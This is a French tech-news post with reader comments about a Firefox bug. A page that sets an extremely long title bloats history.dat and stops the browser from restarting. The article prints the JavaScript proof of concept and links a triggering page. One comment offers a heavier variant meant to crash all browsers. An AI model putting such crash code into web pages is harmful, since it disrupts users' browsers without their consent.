Source: Neowin.net – Mots-clés : Firefox
Catégories : Internet et réseau
Alors que le navigateur frappé d’un panda roux et connu pour être plus sûr que son homologue de Redmond, une faille vient d’être découvert touchant ainsi tout spécialement le logiciel de la fondation Mozilla.
Certes, ce n’est pas une faille de sécurité et personne ne devrait prendre le contrôle de votre machine pour l’instant, même si certains le prédisent, mais ce genre d’incident est assez rare sur Firefox pour qu’on en parle. Le code, que vous trouverez en bas de cette actualité a pour but de créer un sujet pour page Web extrêmement long qui apparaîtra en parti sur l’onglet de la page visionné. Sur le moment, rien ne se passe, mais une fois Firefox fermé, il sera impossible de le lancer à nouveau sans qu’il crash. Bref, le panda n'apprécie vraiment pas les titres trop long.
Sachez que pour résoudre le problème, il vous suffit d’effacer le fichier « history.dat » présent dans le répertoire Documents and Settings\(user)\Application Data\Mozilla\Firefox\(votre profile).
- Exemple de code pouvant bloquer Firefox :
script type="text/javascript"
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
/script
Pour information, sachez que cette faille touche aussi les linuxiens.
- Visitez le site qui bloquera votre Firefox (il faut cliquer sur "Proof of Concept")
ps 50% sur un dual-core
A moins que l'utilisation du terme "faille" est soit là à but de sensationnalisme voici-match...
Faudrait voir à pas confondre "bug" et "faille".
A moins que l'utilisation du terme "faille" est là à but de sensationnalisme voici-match...
+1
Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.
comme quoi ... la greffe de doigts .... ben ca marche pas encore parfaitement !!!
un firefox c'est un panda
http://fr.wikipedia.org/wiki/Mozilla_Firefox
Et là
http://www.mozilla.org/projects/fi [...] e-faq.html
A "Firefox" is another name for the red panda.
Il faut attendre un petit peu pour que ça marche : si on clique sur le lien et qu'on ferme le navigateur en deux ou trois secondes, il redémarre correctement.
http://extensions.geckozone.org/NoScript
Ca évite un bon nombre de failles de sécurité potentielles. On met du temps à le configurer, mais ca vaut le coup.
C'est pas un panda roux... c'est un renard... à moins que ce soit moi qui me trompe
ben ouais
Pour éviter ce genre de faille, y a l'extension NoScript :
http://extensions.geckozone.org/NoScript
Ca évite un bon nombre de failles de sécurité potentielles. On met du temps à le configurer, mais ca vaut le coup.
Y a Lynx aussi
Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.
Pareil chez moi, Firefox est "à l'ouest" pendant quelques secondes (100% de CPU occupé) et puis retour à la normale, mais pas l'ombre d'un plantage (et je réponds par anticipation aux questions: oui je sais cliquer, et oui je sais me servir d'un PC
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
Depuis quand 2 boucles "à la con" peuvent faire planter un softs ?. La gestion des chaines de caractères doit avoir un pb d'implémentation p-ê mais moi je vous fait un code qui "plante" tous les navigateurs si vous voulez
var buffer = "";
var buffer2 = "";
for (var i = 0; i < 50000; i++) {
buffer += "A";
for (i = 0; i < 50000; i++) {
buffer2 += buffer;
}
}
c'est le surnom qu'on lui a donné, bien que ce soit bien un animal de la famille de l'Ours donc du Panda
Effectivement, Firefox est très long à redémarrer. En fait, le temps de traiter le fichier history.dat qui fait 10 Mo au lieu de 380 ko.
A moins qu'avec un titre encore plus long, il plante vraiment, pour moi, ce n'est ni une faille, ni un bug.
La seule "correction" qu'ils pourraient apporter serait de limiter la longueur des titres
rien mme 30 secondes apres !
dsl, j'ai vu sur wikipedia: http://fr.wikipedia.org/wiki/Panda_rouge
c'est le surnom qu'on lui a donné, bien que ce soit bien un animal de la famille de l'Ours donc du Panda
chez présence pc c est des ours mal léché et on aime sa donc aime tous ce qu ia rapport au panda/ours
Pas de pb chez...
Sinon, euh, ca sert à quoi ce code, si ce n'est pour "embéter" le petit monde des utilisateurs du navigateur de la fondation Mozilla
-qu'un webmaster s'assure que seul "ie" puisse accéder à ses pages web ? (s'il veut diminuer la fréquentation de son site, pourquoi pas
-que les sites "powered by M$" (et donc M$) fassent tout pour obliger les consommateurs du web à utiliser "ie" ?
-et sinon, sous Opera, Safari et Cie, ils fonctionnent ou des plantages sont survenus
En tout cas si un site avait la bonne idée de publier un ou des codes qui fasse planter "ie", ce serait pas mal
http://medlem.jubii.dk/capucine/ma [...] e%20s.html
Incroyable, non?
:jap:
ben mince, moi qui pensais avoir l'occasion de voire leur nouveaux systeme de maj l33t qui tue a l'oeuvre rapidement
moi ca plante pas du tout, j'ai un sablier a peine le temps de voir que j'ai cliqué et apres ca me charge le titre de la page "AAAAAAAAAAAAAAA..."
Pas de pb chez...
heu oui, ça c'est normal, le "plantage" a lieu au redémarrage de firefox
Alors que le navigateur frappé d’un panda roux et connu pour être plus sûr que son homologue de Redmond, une faille vient d’être découvert touchant ainsi... Un code pour faire planter son Firefox [MAJ] : lire la suite
La traduction exacte de Firefox est peut etre panda roux (l'animal en peluche que vend d'ailleurs la Mozilla Corp sur leur site) mais le logo represente en renard enflamme. Les developpeurs ne connaissaient pas l'existence du panda roux lorsqu'ils ont nomme leur logiciel.
remarque, après phoenix et firebird, y on pris la premiere marque non déposée qui passais par la, y on cherché qu'ensuite ce que ca voulais dire, surement
Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.
J'ai essayé avec Safari, ça ne plante pas non plus.
Pkoi appeler un "panda rouge" "renard de feu" ??? o_O
pourquoi appeler "lion de mer" un gros phoque o_O ... =>
Faudrait voir à pas confondre "bug" et "faille".
A moins que l'utilisation du terme "faille" est soit là à but de sensationnalisme voici-match...
Je dirais plutôt que ça vient de http://www.futura-sciences.com/new [...] 5_7776.php
Ce site révèle régulièrement des "failles de sécurité", toujours présentées comme potentiellement très graves, et qui démontreraient par leur existence que l'open-source n'est pas plus fiable que Windows.
Je n'irai pas jusqu'à affirmer que l'Oréal et Microsoft ont des relations étroites, mais on se demande quand même...
Je dirais plutôt que ça vient de http://www.futura-sciences.com/new [...] 5_7776.php
Ce site révèle régulièrement des "failles de sécurité", toujours présentées comme potentiellement très graves, et qui démontreraient par leur existence que l'open-source n'est pas plus fiable que Windows.
Je n'irai pas jusqu'à affirmer que l'Oréal et Microsoft ont des relations étroites, mais on se demande quand même...
Je me suis dit en lisant ton post que tu étais sans doute encore un fervent défenseur du libre, prêt à affirmer n'importe quoi dès qu'on touche à ses joyaux. Ben, je m'excuse !
En lisant l'article de futura-sciences, c'est choquant de voir un tel parti pris ; par ex, réduire Firefox aux plateformes Windows et MacOS, en "oubliant" Linux, c'est vraiment n'importe quoi... Futura-sciences, info subjective ? Jusqu'à preuve du contraire je répondrais oui.
Et pour le moment, il s'agit bien d'un bug, et non d'une faille...
La traduction exacte de Firefox est peut etre panda roux (l'animal en peluche que vend d'ailleurs la Mozilla Corp sur leur site) mais le logo represente en renard enflamme. Les developpeurs ne connaissaient pas l'existence du panda roux lorsqu'ils ont nomme leur logiciel.
ouai c'est clair, si firefox c'était le surnom d'une opération de l'armée américaine y'aurait déjà les psychoteurs qui auraient fait le rapprochement entre les convictions de bush et des dev de ff...
on s'en fout que firefox ça soit le nom d'une espèce de panda, firefox littéralement = renard de feu, tiens ça tombe bien le logo c'est un renard rouge basta -_-
sinon oui le terme faille est pas très approprié je pense, surtout vu le nombre de posteurs qui disent déjà que ça ne fait en rien planter (et quand bien même ça ferait planter ça serait + un bug qu'une faille) et que la gestion du trucs est même dans la plupart des cas transparente.
mon firefox est mort, MERCI PPC, je ne peux rien faire, ni le safe mode, ni meme une reinstallation. rien ne marche, et revoila IE, je suis dégouté, suis je le seul? j'ouvre une fenetre qui plante des son apparition, ceci n'était jamais arrivé avant que je clic sur vore lien...
il en fallait au moins un pour que les autres comprennent que c'est bilou qui a hacké ppc pour poster cette news et descendre les utilisateurs de ff...
et l'history.dat ça fait rien
"Sachez que pour résoudre le problème, il vous suffit d’effacer le fichier « history.dat » présent dans le répertoire Documents and Settings\(user)\Application Data\Mozilla\Firefox\(votre profile)."
Sinon pour l'éternel débat sur le nom, ben ils on sans doute remplacé simplement bird par fox...